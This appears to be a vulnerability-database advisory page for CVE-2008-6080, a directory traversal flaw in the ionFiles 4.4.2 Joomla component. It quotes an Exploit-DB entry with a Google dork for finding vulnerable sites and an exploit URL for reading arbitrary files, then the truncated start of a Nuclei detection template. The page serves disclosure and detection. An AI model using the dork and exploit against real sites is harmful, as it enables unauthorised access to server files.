CVE-2008-6080
Published 2009-02-06
Priority: P3 (37) · Severity: medium · CVSS 2.0 base score: 5 · Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploit: available
EPSS: 10.64% (95.2nd percentile)
Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codecall | com_ionfiles | — | — |
No detection rules found.
Exploit-DB: Joomla! Component ionFiles 4.4.2 - File Disclosure (exploitdb · 2008-10-22 · CVE-2008-6080)
---
[o]------------------------------------------------------------------------------------[x]
| Arbitrary File Download Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : ionFiles 4.4.2 Component for Joomla! CMS |
| Vendor : http://forum.codecall.net/ |
| Date : 23 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]
[»] Google Dork
inurl:com_ionfiles
[»] Vulnerable
./download.php
Line 32: $file = $_GET['file'];
Line 33: $download = $_GET['download'];
Line 66 - 91
[»] Exploit
http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1
Nuclei: Joomla! ionFiles 4.4.2 - Local File Inclusion (nuclei · CVSS 5.0 · CVE-2008-6080 [MEDIUM])
Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Template:

```yaml
id: CVE-2008-6080

info:
  name: Joomla! ionFiles 4.4.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: |
    Update Joomla! ionFiles to the latest version or
```

References:

- http://secunia.com/advisories/32377
- http://www.securityfocus.com/bid/31877
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46039
- https://www.exploit-db.com/exploits/6809